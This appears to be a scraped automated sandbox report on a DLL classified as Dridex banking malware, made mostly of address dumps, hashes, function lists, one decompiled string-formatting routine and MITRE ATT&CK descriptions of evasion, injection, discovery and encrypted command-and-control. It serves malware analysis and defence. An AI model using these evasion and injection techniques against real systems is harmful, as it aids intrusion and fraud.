0x6eb2514c
0x6eb2515a
0x6eb2515f
0x6eb25167
0x6eb251a5
0x6eb251a5
0x6eb251a9
0x6eb2520a
0x6eb25211
0x6eb25219
0x6eb2521e
0x6eb25221
0x6eb25223
0x6eb2522b
0x6eb25240
0x6eb25245
0x6eb25245
0x6eb25253
0x6eb25260
0x6eb25264
0x6eb2526d
0x6eb25279
0x6eb25282
0x6eb25287
0x6eb2528c
0x00000000
0x6eb2528e
0x6eb2528e
0x6eb25292
0x6eb25294
0x6eb2529b
0x6eb2529b
0x6eb252a1
0x6eb252a1
0x6eb252a3
0x6eb252a6
0x6eb252a6
0x00000000
0x6eb252a3
0x6eb25296
0x6eb25299
0x6eb2529f
0x6eb2529f
0x00000000
0x6eb2529f
0x00000000
0x6eb25299
0x6eb2528c
0x6eb251b2
0x6eb251bb
0x6eb251c7
0x6eb251d0
0x6eb251d5
0x6eb251da
0x6eb251f9
0x6eb251f9
0x00000000
0x6eb251f9
0x6eb251dc
0x6eb251e0
0x6eb251e2
0x6eb251e9
0x6eb251e9
0x6eb251ef
0x6eb251ef
0x6eb251f1
0x6eb251f4
0x6eb251f4
0x00000000
0x6eb251f1
0x6eb251e4
0x6eb251e7
0x6eb251ed
0x6eb251ed
0x00000000
0x6eb251ed
0x00000000
0x6eb25169
0x6eb25169
0x6eb25169
0x6eb2516b
0x6eb25178
0x6eb2517c
0x6eb25181
0x6eb25183
0x00000000
0x00000000
0x6eb2518e
0x6eb25193
0x6eb25195
0x6eb25530
0x6eb2553d
0x6eb25553
0x6eb25558
0x6eb2555f
0x6eb25567
0x6eb2556a
0x6eb25571
0x6eb25576
0x6eb2557d
0x6eb2557e
0x6eb25581
0x6eb25591
0x6eb2559d
0x6eb255a9
0x6eb255b2
0x6eb255b7
0x6eb255b9
0x6eb255ca
0x6eb255cf
0x6eb255d1
0x6eb255e8
0x6eb255ed
0x6eb255ff
0x6eb25606
0x6eb2560b
0x6eb25612
0x6eb25613
0x6eb25616
0x6eb25629
0x6eb25635
0x6eb25641
0x6eb2564d
0x6eb25652
0x6eb25654
0x6eb25656
0x6eb2565c
0x6eb25663
0x6eb25665
0x6eb2566a
0x6eb2566e
0x6eb25675
0x6eb2567c
0x6eb2567e
0x6eb2567e
0x6eb2568e
0x6eb2569c
0x6eb256a8
0x6eb256b4
0x6eb256b9
0x6eb256bb
0x6eb256c4
0x6eb256c8
0x6eb256c8
0x6eb256bb
0x6eb255d1
0x6eb256d1
0x6eb256d6
0x6eb256db
0x6eb256fa
0x6eb256fa
0x00000000
0x6eb256dd
0x6eb256dd
0x6eb256e1
0x6eb256e3
0x6eb256ea
0x6eb256ea
0x6eb256f0
0x6eb256f0
0x6eb256f2
0x6eb256f5
0x6eb256f5
0x00000000
0x6eb256f2
0x6eb256e5
0x6eb256e8
0x6eb256ee
0x6eb256ee
0x00000000
0x6eb256ee
0x00000000
0x6eb256e8
0x6eb256db
0x6eb2519b
0x6eb2519b
0x6eb2519c
0x6eb2519c
0x00000000
0x6eb2516b
0x6eb252ab
0x6eb252af
0x6eb252b0
0x6eb252b8
0x6eb252bc
0x6eb252bc
0x6eb252ce
0x6eb252d3
0x6eb252e1
0x6eb252e6
0x6eb252e8
0x6eb252f6
0x6eb25302
0x6eb2532c
0x6eb25350
0x6eb2535b
0x6eb25369
0x6eb25379
0x6eb25380
0x6eb2538c
0x6eb25395
0x6eb253a3
0x6eb253b1
0x6eb253bf
0x6eb253cd
0x6eb253d4
0x6eb253d8
0x6eb253dc
0x6eb253ea
0x6eb253ef
0x6eb253f1
0x6eb253f9
0x6eb253f3
0x6eb253f3
0x6eb253f4
0x6eb253f5
0x6eb253f5
0x6eb25440
0x6eb25440
0x6eb25443
0x6eb25445
0x00000000
0x00000000
0x6eb253fd
0x6eb25400
0x6eb2540b
0x6eb2541b
0x6eb2541f
0x6eb2542b
0x6eb2542b
0x6eb25432
0x6eb2543c
0x6eb2543c
0x6eb25463
0x6eb25468
0x6eb2546a
0x6eb25478
0x6eb2547f
0x6eb25488
0x6eb254ac
0x6eb254b7
0x6eb254d5
0x6eb254e1
0x6eb254ed
0x6eb254f9
0x6eb25505
0x6eb2550e
0x6eb2551a
0x6eb25526
0x00000000
0x6eb250d4
0x6eb250e5
0x6eb25104
0x6eb25106
0x6eb25107
0x6eb2510b
0x6eb2510e
0x00000000
0x6eb25110
0x6eb25110
0x6eb25112
0x6eb25116
0x6eb2511a
0x6eb2511e
0x00000000
0x6eb2511e
0x6eb2510e
0x6eb24f28
0x6eb24f2a
0x6eb24f2f
0x6eb24f3b
0x6eb24f42
0x6eb24f4b
0x6eb24f60
0x6eb24f73
0x6eb24f80
0x6eb24f8a
0x6eb24f9a
0x6eb24fa5
0x6eb24fa6
0x6eb24fa7
0x6eb24fa8
0x6eb24fab
0x6eb24fac
0x6eb24fb5
0x6eb24fc5
0x6eb24fcc
0x6eb24fd1
0x6eb24fd8
0x6eb24fe2
0x6eb24ff0
0x6eb25009
0x6eb25012
0x6eb2501e
0x6eb25026
0x6eb2502f
0x6eb25045

Strings

BK., xrefs: 6EB256C4
BK( , xrefs: 6EB2541B

Memory Dump Source

Source File: 00000002.00000001.292482173.000000006EB20000.00000004.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000002.00000001.292530423.000000006EB3F000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: BK( $BK.
API String ID: 0-4055722467
Opcode ID: 7f60cbda6724d88596f820be1f71090e72e6bd5090d3f6152dc6b39c033539e5
Instruction ID: 1db28766addec6a3a4c30554212fb8f7582060f489439bc72bb9c9f2fb991124
Opcode Fuzzy Hash: 7f60cbda6724d88596f820be1f71090e72e6bd5090d3f6152dc6b39c033539e5
Instruction Fuzzy Hash: EE425F301283C19FD725DBA0D890BFEBBA9AF91308F104D3DA59E5B1A4EF705909CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0126129E, Relevance: 1.4, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 012613A5

Memory Dump Source

Source File: 00000002.00000002.320914247.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ace062276d42d08900e6f24e87c0185923075743edc0e6fe2a42c76369fd47d
Instruction ID: c734531f270bab5a5722fb80676bb87191dafbd4cc181ddd99e706c91a82b448
Opcode Fuzzy Hash: 1ace062276d42d08900e6f24e87c0185923075743edc0e6fe2a42c76369fd47d
Instruction Fuzzy Hash: 6141F5B5D1421A9FDB04CFA9C4906AEBBF0FF88310F15852DE448A7380D375A890CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EB2C1D4, Relevance: 5.1, Strings: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6EB2C1D4(void* __ecx, void* __edx) {
				char _v28;
				char _v33;
				char _v38;
				char _v43;
				void* _t24;
				char* _t25;
				char _t32;
				void* _t33;
				void* _t34;
				signed int _t38;
				char* _t40;

				_t40 = (_t38 & 0xfffffff0) - 0x2c;
				asm("movq xmm0, [edx]");
				_t32 = 0;
				 *_t40 = 0x7b;
				asm("movq [esp+0x1], xmm0");
				_v43 = 0x2d;
				do {
					 *((char*)(_t40 + _t32 + 0xa)) =  *((intOrPtr*)(_t32 + __edx + 8));
					_t32 = _t32 + 1;
				} while (_t32 < 4);
				_v38 = 0x2d;
				_t33 = 0;
				do {
					 *((char*)(_t40 + _t33 + 0xf)) =  *((intOrPtr*)(_t33 + __edx + 0xc));
					_t33 = _t33 + 1;
				} while (_t33 < 4);
				_v33 = 0x2d;
				_t34 = 0;
				do {
					 *((char*)(_t40 + _t34 + 0x14)) =  *((intOrPtr*)(_t34 + __edx + 0x10));
					_t34 = _t34 + 1;
				} while (_t34 < 4);
				_v28 = 0x2d;
				_t24 = 0;
				do {
					asm("movd xmm0, dword [eax+edx+0x14]");
					asm("movd [esp+eax+0x19], xmm0");
					_t24 = _t24 + 4;
				} while (_t24 < 0xc);
				_t25 = _t40;
				 *((char*)(_t25 + 0x25)) = 0x7d;
				 *((char*)(_t25 + 0x26)) = 0;
				E6EB2DF84(__ecx, _t25, 0);
				return __ecx;
			}

0x6eb2c1db
0x6eb2c1e0
0x6eb2c1e4
0x6eb2c1e6
0x6eb2c1ea
0x6eb2c1f0
0x6eb2c1f5
0x6eb2c1f9
0x6eb2c1fd
0x6eb2c1fe
0x6eb2c205
0x6eb2c20a
0x6eb2c20c
0x6eb2c210
0x6eb2c214
0x6eb2c215
0x6eb2c21c
0x6eb2c221
0x6eb2c223
0x6eb2c227
0x6eb2c22b
0x6eb2c22c
0x6eb2c231
0x6eb2c236
0x6eb2c238
0x6eb2c238
0x6eb2c23e
0x6eb2c244
0x6eb2c247
0x6eb2c24e
0x6eb2c251
0x6eb2c257
0x6eb2c25c
0x6eb2c26a

Strings

-, xrefs: 6EB2C21C
-, xrefs: 6EB2C1F0
-, xrefs: 6EB2C205
-, xrefs: 6EB2C231

Memory Dump Source

Source File: 00000002.00000001.292482173.000000006EB20000.00000004.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000002.00000001.292530423.000000006EB3F000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -$-$-$-
API String ID: 0-1033403326
Opcode ID: 3bcb1c0b60ca92e27096eaa2d553d5c3dbbba5bc116b79c7349b8b07f6487243
Instruction ID: c3166cedd82abb5e7d32728e4e9f2bd02b7a09354de3a66845f221252fea6079
Opcode Fuzzy Hash: 3bcb1c0b60ca92e27096eaa2d553d5c3dbbba5bc116b79c7349b8b07f6487243
Instruction Fuzzy Hash: 6E11291091C3C04CE3099ABC548033BFFD54F9A108F189ABED4DECA653D515D4558777

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report triage_dropped_file.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6EB30730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6EB32234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6EB32820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6EB33138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 0076141B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173
memoryCOMMON

Function 6EB310A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6EB357B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6EB35B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 00761D4F, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 6EB31166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6EB35BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EB35BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EB35BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6EB35BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6EB35C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6EB35E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6EB35E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6EB3564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6EB31030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6EB33628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6EB21494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6EB2A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6EB28428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6EB39370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6EB3143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6EB26D0C, Relevance: .0, Instructions: 36
COMMON

Function 0126141B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173
memoryCOMMON

Function 6EB24D50, Relevance: 3.2, Strings: 2, Instructions: 650
COMMON

Function 6EB2C1D4, Relevance: 5.1, Strings: 4, Instructions: 53
COMMON